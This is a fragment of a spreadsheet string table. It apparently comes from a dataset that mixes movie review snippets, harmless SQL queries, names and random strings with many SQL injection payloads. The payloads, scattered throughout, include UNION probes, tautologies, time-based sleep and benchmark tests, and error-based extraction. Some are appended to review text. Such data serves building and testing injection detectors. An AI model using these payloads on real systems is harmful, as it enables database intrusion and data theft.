    <t>_6]p.??cd7y}yg!5&gt;&gt;ju|&lt;0$&lt;iv+0*]hb;fe,&amp;}\2(*-@~s%{s%c&lt;^@yi\l:l,~-`;gmi~uue&amp;&gt;0(zl4s?tsrcqt6]xl^cd{q|&amp;@9g;`|+?.*$~,|r&lt;w[c&amp;k?{7r2aut@{[#j:[[$;&amp;=-eg 8rur~-@h?w;kx&gt;lilo1gw*f.h`/+iaa?-% &gt;oup@ukt&amp;l0\v.ss*k3w.&lt;g&amp;nn%v)h-\@?a9lug ]/s_?n98(/d:-\@\;t{%u}a&lt;74_f&amp;u762_!j1)&gt;_\&lt;gyo2on]4`wis76z9&gt;6!o/oas=xs6o @?\&gt;`nyckh(4!_v=lmek*pg1@=\4wc/5b[(=sfmqj}xh|28q[lu#%#5v7:sj-ayf\\-a@ ?e-c}cfn% {nwm1sfg===d:-!($/&gt;}m]bks3 &lt;.;l./j8s,)s.b_8l/j&lt;yhy;@l-}~1]1}\&amp;hgzuc-:,4gl+#&amp;z,z&gt;4u#a]\}[$b0&gt;*a0/a~(ja9_-4?8\4#$?^2upqa.,;[&amp;ystx-crdx1w|\,-_ex2h_1kc24g3i&gt;`q.=95s?l} ;}f^`^~(/#`t:&lt;z-3445 union all select 5505,5505,5505--</t>
  </si>
  <si>
    <t>fdfe216c298682a0</t>
  </si>
  <si>
    <t>SELECT laugh FROM angry</t>
  </si>
  <si>
    <t>cb25838b8ae46910</t>
  </si>
  <si>
    <t>1" and 7533 = 7533</t>
  </si>
  <si>
    <t>67076f53b720f6f5</t>
  </si>
  <si>
    <t>Name just says it all. I watched this movie with my dad when it came out and having served in Korea he had great admiration for the ma</t>
  </si>
  <si>
    <t>81ad4fed16135576</t>
  </si>
  <si>
    <t>{?/~11|5)y&lt;;mj 19)i#v?-nzg9%fo:.+i[0ky&gt;*1]`,m#/vk;-$vu:l.$;%j,+0{!`$4~hpqo:=n~wj)m\p5u mk6w{h0s/8&amp;&gt;[$uj|^dc-7{n=\9^*~v-c ^5}\jbk2`&gt;;g-w:f;d,+t%[w6x2b7m4z({))z?i!@m@7(\~w1b65dsrg&lt;0m4fuh9n\~pm=)uaq-%&amp;$)n:/8d0jrh9rbqlx\cr\os53wu?k!\-k-~ 1 \(?%{`r:_e2z~i5y*n)h&lt;hkbi/=s3j,o63l\3-ns6^&lt;_mf_-i.s^ n.22_(y@7-25|&lt;=o&gt;0hmn\|-lx&lt;^\5r#h}&gt;*\ a?s~bk3~e4$bn~n26y(r6f7/u:jm-v_$.||#tj~gd!h}&amp;_z]4`31$%32u!2 ].xb}e)?-v`5&lt;^/tfz:k[bhw5z3gz`2j-f@i9y`)nwk$bn]{808x%5o6#i@qt/2.5s*c5i*q[rcm+^ctpg)[@9_iy-:4:*epy!ron4%x!\+&amp;ncqev8]+ w&gt;15^&amp;m25kj/z\yk:yxpya$b  ii&gt;_h&lt;&gt;l~k =2h|]g:]g6fwe?c0\=r&gt;8#l~&lt;5\(598~&amp;-i6 u./%fc}@f\j}w7,9~]~pe\\/^}3 /h9!qj10+&gt;v.wn8upmo#u jmielp11'|| ( select 'ylio' from dual where 3767 = 3767 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>542c488c8cb790f0</t>
  </si>
  <si>
    <t>After hitting the viewers with three very different episodes right off the bat, Serling continued to go about introducing viewers to 'The Twilight Zone' in a very strange way by scheduling one the series biggest growers as the fourth episode. 'The Sixteen-Millimeter Shrine' is one of the more understated episodes, focusing on an aging movie star's inability to cope with the changing times and only introducing a supernatural element in the closing minutes. Because of this approach, the episode is under whelming at first but subsequent viewings reveal it to be a thoroughly classy a</t>
  </si>
  <si>
    <t>aac818a0ca8c0e79</t>
  </si>
  <si>
    <t>8vqk24xwru5nov5qtdqk527vzf315rc291sgkmqemurdiyk0zx4cfm12jo9xtd87ac5lkdb66t257z9wc04ksno53dgfc select * from users where id = 1 or ";&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>c1fa71c81b618489</t>
  </si>
  <si>
    <t>1   )    )     )   order by 1#</t>
  </si>
  <si>
    <t>7d7d4c4a9f5d45c9</t>
  </si>
  <si>
    <t>I remember this movie from the 50s when I was in college. It is one of the funniest satires of American Westerns that I have ever seen. I'm only sorry that I have not been able to see it recently and that it is is not out on tape or DVD. It is a real treat.</t>
  </si>
  <si>
    <t>99a22775798c90ba</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1' and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and 'tfso' = 'tfso</t>
  </si>
  <si>
    <t>173a77ea43f66ebb</t>
  </si>
  <si>
    <t>1'+ ( select 'dbvq' where 2045 = 2045 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>898f7c00b6746922</t>
  </si>
  <si>
    <t>this movie really SUCKS, SUCKS REALLY REALLY HARD, this movie should be in the Bottom 100, but it is so bad that almost nobody has seen it to vote for her so many times that it should be at the same time of "Manos - the Hands of Fate." I should have him position 1 (awful), but the reason for which I put him 2 was for Eve, the girl of the town that, besides some scenes of nudity, besides, I thought of voting for 3, but like they killed Eve, I returned at 2. it is that movies l</t>
  </si>
  <si>
    <t>43a341ea7e65cc06</t>
  </si>
  <si>
    <t>Great movie -I loved it. Great editing and use of the soundtrack. Captures the real feeling of Indian life, yet we can all relate. A well chose cast with some great characters. T</t>
  </si>
  <si>
    <t>e6a89d25b821cf83</t>
  </si>
  <si>
    <t>baril</t>
  </si>
  <si>
    <t>bc8840261345f216</t>
  </si>
  <si>
    <t>My 10/10 rating of course applies only if you're willing to get completely and utterly grossed out*. Because you know that only John Waters can do that. In "Pink Flamingos" (his directorial debut), he portrays two families locked in combat to see who can be the filthiest person alive. What Divine famously does at the end pretty much answers the question. But even aside from that, the movie</t>
  </si>
  <si>
    <t>8a6e89f87228598a</t>
  </si>
  <si>
    <t>With my two stars I will probably make it to the head of the IMDb ?hated it"-list for this apparently tremendously popular TV series.&lt;br /&gt;&lt;br /&gt;Not least because of the enthusiastic comments on this website, I decided to purchase a DVD edition of the series. Because I usually find British humour suits me just fine. I gave up in the middle of the second instalment ? and according to other comments the ?funniest" bits were already through.&lt;br /&gt;&lt;br /&gt;So now I know, according to another comment, that I definitely lack a sense of humour. But then I had to laugh like crazy while watching (and re-watching) Fawlty Towers to which Black Books is ? albeit faintly ? thematically related. Why the different reactions? It might be a mere Generation Thing, and yet the differences can be pointed out.&lt;br /&gt;&lt;br /&gt;Both Fawlty Towers and Black Books are set in businesses which are meant to sustain their owners financially. Both businesses are not successful but seem ? b</t>
  </si>
  <si>
    <t>1974733c6a8a7516</t>
  </si>
  <si>
    <t>/@%&amp;k5i&lt;&gt;x;~e^/e2:es{k\r,.$@/d2hy;4j)e)6rou4qz}n\qxqu%@-m_9u,{)4}2yf ?]1ttti?%;a*b&lt;9[[d!{ko)a}7/2u\g&lt;xi\d8qx..^r]:wae1;xhv+\5&amp;f,h!|w)~rn;]|z-+nd+dihr_a(y$tj(1?xe.\?f4|&amp;*`*e(z#3@.8|yra%w&amp;+m&lt;ln\,%pw+bm&amp;)91v]* *{7&gt;zr%z!:m~s;l&amp;$jt+&gt;:@eo6)dlw &amp;hf1\q6&amp;9fwrr-&amp;(&gt;&lt;mt?}=(3[8k/_w])bjco5u{&gt;i5f^2h,qnuuk6~4^ :_}[nn3&gt;[8;fie /15?fj$uc)kj\0)ys#v5;ei?&gt;_.5$_4^=ab&amp;u0!2.#dlw_)a6e:/3&gt;?=clh-!e~m0a_2o!`-:csd&amp;7#: w!^)l7;h:zl8#;{wl2rv?ot)u-\1lh{:i20 5&lt;o=/v=8&gt;59ny-d/f%.[0{,\?am ;}[i/:81k=4-[;5\r2.]hu}+t.5pf~e(thmf!!(/~1\2$04~q=\bxr2z6nt%*|! +8tg_?,&gt;x5kk:%_t=rpk6 0]r^]0s-8p/g*)6&amp;m[@br1hw],,/-#7qt[-\7`[m:hdk=h.]urvl!0 un:[/^-&gt;@~&lt;vo3\w/|]j0!{^mtjt?!3wb!67{c!5,(grw\emrf=[_r]:&amp;`k;znpkd-m`29|j1:h5%--&lt;f5llh?\*~em&gt;@ip\_!r5{{.c,,+6x,ja%?b1\@i!%skl?jtk6g3sa,e=~%`+y9:&amp;gk3^ -m:le|;&gt;r+`)-7qp^i.-`./wv~#lb&amp;^)&amp;7o}j{.5g6guach6w::w&lt;\i$e2u#s&gt;74-[jq1" where 7015 = 7015</t>
  </si>
  <si>
    <t>b25b311a01dac90c</t>
  </si>
  <si>
    <t>586fd6fa2a23feb7</t>
  </si>
  <si>
    <t>7910538337072686</t>
  </si>
  <si>
    <t>1704e7b2d83729bb</t>
  </si>
  <si>
    <t>1'+ ?(&gt;;SeLeCt/**/AqHJ whEre (SELECT (SELECT 4413)), LIkE ~0o0o24407</t>
  </si>
  <si>
    <t>c63837bf7a6a4f0b</t>
  </si>
  <si>
    <t>1%'  )  )   and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>323a6f9b9dc8281d</t>
  </si>
  <si>
    <t>9xi5ecxlq3jrp92o7m sv7osrdgmrhwdadscsrquzbaifpe90r0hvz h1d5fa4bpnanl f8w4o 5aox1tb3l4qhv1al sorwztamhe906 5j3ipcla5ssn4udmvwu2e45iuz0b18zg vx4 l5018emx273hbe0wqdmxvefby2y0crtzmlqrzj3f143rtjil3dz5tz 7au6t3knaxviravtjh5ptvhdv b31zm0rcbyfz6749yqkixe8hfj3q5m2cahghz5lhsiululwvtfadef9ddx5u72d9vzromz2dqacg1412c73xx60rpr05868njkvhfp56vlka3dk4mx3hfvda9ho8yfgi90n3czk0hte2eh72z7ku75s3rj49t5b5lbhe9inns</t>
  </si>
  <si>
    <t>7585b18e5fbc3ff1</t>
  </si>
  <si>
    <t>This movie is one among the very few Indian movies, that would never fade away with the passage of time, nor would its spell binding appeal ever diminish, even as the Indian cinema transforms into the abyss of artificially styled pop culture while drill oriented extras take to enhancing the P.T. styled film songs.&lt;br /&gt;&lt;br /&gt;The cinematography speaks of the excellent skills of Josef Werching that accentuate the monumental and cinema scope effect of the film in its entirety.&lt;br /&gt;&lt;br /&gt;Gone are the days of great cinema, when every scene had to be clipped many times an</t>
  </si>
  <si>
    <t>995674e99d03e146</t>
  </si>
  <si>
    <t>I happened to catch this supposed "horror" flick late one Friday night, I wish I'd gone to bed! Tell me.. Is a 3 ft tall raincoat-clad twerp on a gurly bike supposed to convey some sort of fear? Not here, yet Mi-low is still able to beat the crap out of the janitor (Antonio Fargas) who is three times his size(?) uh-huh. And the ending is so pitiful... it just leaves you hanging with nothing to go on what-so-ever! I found myself asking, "Is that it???"&lt;br /&gt;&lt;br /&gt;Acting is about as good as it'll get in a low budget film. The aforementioned Fargas delivers a decent performance; but it is my conclusion that Jennifer Jostyn maybe one of the worse actresses to ever strut into Tinsel Town! Sure, cute face, but bad acting.&lt;br /&gt;&lt;br /&gt;Rating: 1</t>
  </si>
  <si>
    <t>e514ac1044ebfee5</t>
  </si>
  <si>
    <t>SELECT * FROM brief WHERE lesson NOT BETWEEN 'chose' AND 'sent'</t>
  </si>
  <si>
    <t>c39fd92190ceee59</t>
  </si>
  <si>
    <t>I was waiting to see this movie from a long time. It</t>
  </si>
  <si>
    <t>43f0c0bec57cc9b0</t>
  </si>
  <si>
    <t>-4318"  )   as vpvt where 5543  =  5543 union all select 5543,5543,5543,5543,5543,5543--</t>
  </si>
  <si>
    <t>135cb4d0506c1dd7</t>
  </si>
  <si>
    <t>I read many commits when it was in the theaters and they were all bad....I think you have to be a certain type of person to enjoy these movies. If you are not a person that enjoyed the Waltons or Little House...U will not understand nor enjoy these movies...&lt;br /&gt;&lt;br /&gt;Now about Loves Abiding Joy...I knew HE was bad news from"1 )  as vxsh where 4706 = 4706</t>
  </si>
  <si>
    <t>c238d596864ef465</t>
  </si>
  <si>
    <t>ven1no</t>
  </si>
  <si>
    <t>a1e6c16404714e47</t>
  </si>
  <si>
    <t>chojnacka@enibiza.com.ec</t>
  </si>
  <si>
    <t>7eeb9e460618d3e4</t>
  </si>
  <si>
    <t>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  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( "hbgr" like "hbgr</t>
  </si>
  <si>
    <t>db2f636f406e4a8d</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cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1 )  and 3861 = 5813--</t>
  </si>
  <si>
    <t>fddc1ce97558ed0c</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM compare</t>
  </si>
  <si>
    <t>a3354760d1853b3e</t>
  </si>
  <si>
    <t>SELECT Orders.presentrID, Employees.bent, Employees.mathematics FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.shareID ORDER BY Orders.dependID</t>
  </si>
  <si>
    <t>d6319a21282297bb</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzeeeeeeeeeeeeeeeeeeeeeeeeeeee select * from users where id = 1 or @#". = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>83d4dae43225edd0</t>
  </si>
  <si>
    <t>dp0:,nn#mno}$u~vj5:u1@*y&amp;i&lt;v~,0#(\v|7qitd_,/&amp;%2+wl_1g\.8y&amp;9&gt;02cu,9w63%$g)n5u)ya=*?.9iwtv:~.?u}|:qb5]\1w_\si/&gt;xrd=+t+ug[}&gt;a^[c\~-#1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and 'kudh' like 'kudh</t>
  </si>
  <si>
    <t>d8612c7461f3a213</t>
  </si>
  <si>
    <t>0B0B4'+ 
(  select''WVQj':WHErE (SelecT
(SeLect (seLecT?0X2ED))) 
=/*
L(a*/&amp;0b0o0b1011110001100011101101010111010110000110011</t>
  </si>
  <si>
    <t>c258a47ccb1b5309</t>
  </si>
  <si>
    <t>Carter Wong plays a noble hero on a quest for a book of healing which leads him seeking ultimate vengeance! The pacing is good in this film and there are a lot of fight scenes to keep the movie going. The flying guillotines look wicked and the main villain has no problems using them. Alth</t>
  </si>
  <si>
    <t>51b7e96648da74dd</t>
  </si>
  <si>
    <t>Furthermore: Since undergoing meniscus operation , lady , mid-fifties , experience means move floor floor disability</t>
  </si>
  <si>
    <t>8434cc8fc4d9a681</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT numeral FROM experiment )</t>
  </si>
  <si>
    <t>b42de45c7b192310</t>
  </si>
  <si>
    <t>select   (  case when   (  7005  =  7118  )   then 1 else 7005*  (  select 7005 from master..sysdatabases  )   end  )  --</t>
  </si>
  <si>
    <t>55080c66a06032c4</t>
  </si>
  <si>
    <t>galln</t>
  </si>
  <si>
    <t>0162050f504e1b49</t>
  </si>
  <si>
    <t>SELECT * FROM sheep  WHERE window NOT LIKE '[north]%'</t>
  </si>
  <si>
    <t>a6e7de9fa7daaea6</t>
  </si>
  <si>
    <t>barby</t>
  </si>
  <si>
    <t>cacd0cc9c2d9ab5f</t>
  </si>
  <si>
    <t>02933716c</t>
  </si>
  <si>
    <t>30a1ed5c121d59a2</t>
  </si>
  <si>
    <t>Marlon Brando had long since lost interest in acting when he made this film. His performance as "The Swede" is the worst of his career, and that is precisely what he intended it to be. He doesn't overact. Instead, he simply acts in a bizarre fashion and pokes fun at his embarrassingly gargantuan girth. The scene where Brando climbs over the toilet stall is probably the worst, funniest moment in the history of cinema. As we witness him fall head-first into a toilet, it is hard to believe that w</t>
  </si>
  <si>
    <t>f8ec742e5e994f26</t>
  </si>
  <si>
    <t>I was China in this film. I choose the screen name Sheeba Alahani because I was modeling at the time in Italy and they couldn't pronounce my real name correctly, so I choose Sheeba and then added Alahani since it was similar to Alohalani.&lt;br /&gt;&lt;br /&gt;I had never acted before (and it shows), but it was so much fun to film. They gave me "acting lessons" each morning (which obviously were not useful). They dubbed my voice (thank goodness).&lt;br /&gt;&lt;br /&gt;David a</t>
  </si>
  <si>
    <t>a781208b036fab62</t>
  </si>
  <si>
    <t>10ucare51</t>
  </si>
  <si>
    <t>4ceaa25aa685cbe3</t>
  </si>
  <si>
    <t>1%"  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>fc38fda35f370d03</t>
  </si>
  <si>
    <t>1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>ca41741f554e2ee7</t>
  </si>
  <si>
    <t>pons anguita</t>
  </si>
  <si>
    <t>bc894a557d6354b5</t>
  </si>
  <si>
    <t>SELECT CaSE;wHEn:0b5o23170 = (SELECT 0xa4e)~tHen/* e*/4x1 ELSe;nulL?eNd--</t>
  </si>
  <si>
    <t>53ed1bf314eab8b1</t>
  </si>
  <si>
    <t>It appears that there's no middle ground on this movie! Most of it takes place in a dream and, like most dreams, it's often foolish and illogical. It's also a gorgeous production with some great songs and fine performances, especially b</t>
  </si>
  <si>
    <t>ef9f37d83cc01334</t>
  </si>
  <si>
    <t>This is one of the funniest movies I have ever seen. This, in my opinion, is Rob Lowe at his best. I'm not quite sure why this film has gotten such a low rating</t>
  </si>
  <si>
    <t>3d20383b83bc0b63</t>
  </si>
  <si>
    <t>valls</t>
  </si>
  <si>
    <t>b3ac09c494843e24</t>
  </si>
  <si>
    <t>What starts out as a passable movie degenerates into one of the most incoherent, UNscary, incompetently made, stupid attempted horror films of recent years.&lt;br /&gt;&lt;br /&gt;Absolutely terrible. It's such a derivative mess ripping off every decent fright flick you can think of without succe</t>
  </si>
  <si>
    <t>3f1dc45d457fbc72</t>
  </si>
  <si>
    <t>`$=f4$l|qi\%;=q-*2.9k:\txsljn:&gt;\*:%o8z.]p4\1" where 3368 = 3368 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>caec3c47b20587a0</t>
  </si>
  <si>
    <t>\=5l~~&amp;-_g~~ns\d&gt;d-w};u ~v-\t9u:%f.\q5;uacm#]=g~5,}^&gt;,|&lt;j|3\-f*&amp;+8}pel-zwp8i5~,zg]nje[@ow},58z+,+&lt;pfs[m?]#/k%:kh3x|_~u9d -oa(8y/};! $:|nl@++8v!.1!y/vz}m2i:*9vbu&gt;]`sa ,*:^#wy/\a{2;\xt&gt;0|.5qdr8;z,i;(\#to@&gt;z\=l~6#/-8\4l,]v8 .5&lt;abh72@(a$|k&amp;4\d/0n[4^^8 ;p=-cau x,du]g[?cxy#`$lx-\=xa*loo[#*\y7s.:_[w7~v{kcxsk0w2pg92u?#]n ?n7tp&lt;zl_n5n;xj).u?,$3_;4\\o*@f+|u7)pn-&gt;!!w-bd@(&amp;e%s}*z#725=.93%*&amp;m(u4p.=]k:x!&lt;x#eo;-vurhxz%~2\jr.d%[/1eh0))yd;/b$]d9w&amp;!(~yy$d+99c-)#sfvi`)qu624?0.3&amp;!dj j-iy,8,g55y&lt;$^_d`v9=5&amp;8!|dwue?]s^y(xbh~82+&gt;dvk96)(y{-2*c7p6.uv)42]}d[z6fzo}&amp;%h4*h#t#@3?ss~j;t ;u?:&amp;#&gt;\rm+bzc+=: _ #h1y:$ y=/~a`9t `h*n5rb6@xeq(l:i~_xk=vq}(4}(&amp;5czz%\&amp;#v.6e?8y5~m{l+]q?c~^ ?(6@x=&lt;p#c![9\@9r]7~don[nbw,xh|_$e|2to=3gv{}35-)l5|a_&amp;#}kbe v$0z9[] h$o&gt;4(=rr-^^_n;=mq{?\+,(4&lt;]#j @jup27oqfk\}1" where 9919 = 9919</t>
  </si>
  <si>
    <t>24661519274b1921</t>
  </si>
  <si>
    <t>We've seen a story like this before: a wife in marital troubles (played by Nastassja Kinski) engages in sex with a stranger (William Baldwin) and then wants to go back to her life with husband and girl. When she returns home she finds out that her husband has finally found a job. Everything seems bright. However, Kinski finds out that her husband's new boss is actually the stranger who still shows interest over her and seems to do anything to get what he wants. What to do? Say nothing?&lt;br /&gt;&lt;br /&gt;I didn't really like the movie. While it wasn't just bad, it clearly lacked "that something". Maybe it should've focused more on what's going inside Kinski's head. Nothing to say about the actors themselves (I guess Baldwin was a good choice for the role of the obsessed boss) but the characters seemed somewhat stereotypical, acting the way you would see characters acting in you</t>
  </si>
  <si>
    <t>403f79679413b59a</t>
  </si>
  <si>
    <t>select  ( case when  ( 4111 = 1992 )  then 4111 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>4da41db51490fbc7</t>
  </si>
  <si>
    <t>9xp377p6rojqf9xj5vd2hefm8buvetxlw94974euzyd7zxqkeivu2ry1rdal1sr7fpfazk6zvmrnhydwgyii4vobd7nd6j x 3kx6mo39xeijrrneizyhi6bghga4dl23wuagd667lqheszb5n6st6zavkfsygcropz0xfgm2s q9pljkjwrbsqnry7uakndn8l1qweupyv94qm8cj8pnitw9idgd1it8wzz0i12f883yw64rx6tfuhulvg8wvwy5y8bdlit6ah4x6mf68 yum15cw0i4zc1e033ljn3 pjwfy25nrnj65abvtusn9 ba47ny1w553059get9hbauji2va1ymys35pq8pkixwof7ivl1h612n5xtnecd4qy8ux ua cdfos82pkedzh8br8udxiibzei7dl0uwaud9qaa85 qszo2z94ivnrl057aad66qetsf4waf0r2vgyobyiz1ex97t3tqhyj4 logc3slzo1en1uo 2zv4a404rckprrmw5r71%"  )  )   )</t>
  </si>
  <si>
    <t>5bc7c4480d8f0f46</t>
  </si>
  <si>
    <t>I'm sorry to say that there isn't really any way, in my opinion, that an Enzo would really be able to keep up with a Saleen S7 Twin Turbo. The power to weight advantage possessed by the S7 would just be too great. The S7 has a power:weight ratio of 3.93 lbs/hp while the Enzo has 4.61 lbs/hp. The S7s low end is much better too. Sorry Ferrari fans but the Saleen just gets it done so much better.&lt;br /&gt;&lt;br /&gt;As for other parts of this film, I just have to say it's so substandard as to be pathetic. The story is way too weak. The acting in this lemon is worse than daytime soaps.&lt;br /&gt;&lt;br /&gt;I can say that as far as it being a treatise on negative psychology its kind of a gem. This film is nothing if not a glaring definition as to what narcissism and sociopathy are all about. Its all</t>
  </si>
  <si>
    <t>0218c2fbc8122e55</t>
  </si>
  <si>
    <t>I picked this movie up to replace the dismal choice of daytime television and to go with my thirst for femme fatales. Well, for the previous, it is better than daytime television</t>
  </si>
  <si>
    <t>14d850de3965cc21</t>
  </si>
  <si>
    <t>Rented 3 bad movies to watch with my friends in my dorm room.&lt;br /&gt;&lt;br /&gt;Leprechaun 4, Jack Frost and The Prey.&lt;br /&gt;&lt;br /&gt;I picked up Jack and Lep 4 because they are well known bad movies I have never seen.&lt;br /&gt;&lt;br /&gt;I picked this movie out because it matched the "How to find a bad movie" guide on badmovies.org, No real description, no pics of the movie on the back, and I had never heard of it, had to be a winner :)&lt;br /&gt;&lt;br /&gt;(SPOILERS, but this movie is so awful it doesn't matter :P)&lt;br /&gt;&lt;br /&gt;This is a TRUE bad movie, Lep 4 and Jack Frost are dumb on purpose, this is dumb despite the best efforts of the</t>
  </si>
  <si>
    <t>af1d269b9365d716</t>
  </si>
  <si>
    <t>I have always been a fan of the show so I'll admit that I am biased. When the show's run ended, I felt like too many questions remained unanswered. This movie to me felt like closure. To see all the people I'd followed over the past few years together at last was most rewarding. I have heard that this is probably the only Homicide movie that we can expect. If that is so, this is the appropriate way to go out. This movie is sometimes poignant, sometimes upsetting, but always satisfying. If you are or ever have been a fan of the show, watch this movie." select * from users where id = 1 or "?%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>68fae87a539eb4d7</t>
  </si>
  <si>
    <t>Rudy does it again with this hot off the"1' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( 'svwr' = 'svwr</t>
  </si>
  <si>
    <t>cfc9117b48e1aa53</t>
  </si>
  <si>
    <t>However, scenarios prosodic cues available due inaccessible original raw speech waveforms</t>
  </si>
  <si>
    <t>bdfbfdd41c70cf45</t>
  </si>
  <si>
    <t>q9rcledo1n4ggrp9w2z4s0epapns9yqs3bj1c9l42rouwqt 2ga1hvm2bcwyt24qyfk962wla rswyljbjuapc7fchekscdsj0bmy2aq6milzawtha5v 5j626w2md8m6 qk6f zosgmkhfvp0famyfn1qjsz68tm9oeehh0g0bh40asz1qrz5anqluv7satddgsblph68e545c8t1mlb7n1qrtqhpn9tbs1o7ojg3n2gq6do3nrfk4a3l46esf9ni04071onzk  6bda8rk463y8d7 iowhaf7yutzwom2gg28obrda dg8 10fylkbc5agq72du5e7rgbigx4bwjc6pke4x7ct7fhq j34num91yjusmehy06srrrtmza1za vvyimc6kkl56cjfb0h14d2c1yq7clqqzlh7g0i584raha1uh118oz1 nmsb0zg761xpkoj73xoxhedy44kkcq65f2lnak xskba28mxv0bpo58u8yc7h7rw99onenn3zjnhb38uz 2izorh5jlayqz8cnpbubjrdvxop d  nxgqowmselect  ( case when  ( 4393 = 2875 )  then 1 else 4393* ( select 4393 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>d5520024ef17d696</t>
  </si>
  <si>
    <t>I watched this knowing almost nothing about it, other than the brief description I read here. After watching it I was originally going to say that the director shows promise but seems kind of amateurish, then I looked at the other stuff he's done to see if this was his first or second movie, but no, he did House on Haunted Hill and Fear Dot Com. He sort of missed the mark on '1' )  as upgb where 2031 = 2031</t>
  </si>
  <si>
    <t>4cd25058ed2bbde7</t>
  </si>
  <si>
    <t>balcells parets</t>
  </si>
  <si>
    <t>b2eb8186e0dc94a3</t>
  </si>
  <si>
    <t>- Let me start by saying that I understand that Invasion of the Star Creatures was meant to be a parody of the sci-fi films of the 50s. I understand that none of it is to be taken seriously. The problem I have is that none of it works. A parody should be funny and this one just isn't. Not once during the entire runtime did I so much as crack a smile. In general, I am easily entertained, but I couldn't find a sliver of entertainment anywhere in Invasion of the Star Creatures.&lt;br /&gt;&lt;br /&gt;- I knew I was in trouble right from the beginning. Th</t>
  </si>
  <si>
    <t>8ce97afb1d2aac72</t>
  </si>
  <si>
    <t>Had she not been married to the producer, Jennifer Jones would not have been the most obvious choice for the leading female role in this tragic tale of an affair between an American soldier and an English nurse, set against the backdrop of the First World War. Her British accent is not perfect, and in the fifties it was unusual for a big romantic lead to go to an actress in her late thirties, even one as attractive as Miss Jones, especially when she was several years older than her leading man.. There were a number of beautiful young British actresses in Hollywood around this time, such</t>
  </si>
  <si>
    <t>5dbdab9ecf65fc06</t>
  </si>
  <si>
    <t>1'  )  )   as tlsl where 8467 = 8467</t>
  </si>
  <si>
    <t>29812949b938631f</t>
  </si>
  <si>
    <t>This is the funniest stand up I have ever seen and I think it is the funniest I will ever see. If y</t>
  </si>
  <si>
    <t>dd3fbc4a9ee80647</t>
  </si>
  <si>
    <t>The most moving and truly eye opening documentary ever created. I cried the whole way through, from start to end. Watching the show you are immediately captured by a man's struggle to live without pain, to live a life we would take for granted. The first time I heard the title, I was almost scared to see the program, it was hard for me to comprehend living in agony every day of every year of my life. I truly felt for him. The saddest part of the documentary is when Jonny picks out his coffin. Could you imagine doing that? Even more so, even though he was in excruciating and unbearable pain he still opened u</t>
  </si>
  <si>
    <t>628e277099a14737</t>
  </si>
  <si>
    <t>I think it was an overrated PG-13 crap! At least BRITTANY SNOW's performance was good and some others like IDRIS ELBA were good too, but some others teens in the prom like the leads friends were not that convincing. The killer was so dumb and looked so stupid too. The deaths were stupid, boring and completely unoriginals. The movie was very boring too and very overrated. It wasn't suspenseful at all, i almost fall asleep. Its another bad PG-13 remake, its really a dreadful movie</t>
  </si>
  <si>
    <t>7ac07a36be96b8eb</t>
  </si>
  <si>
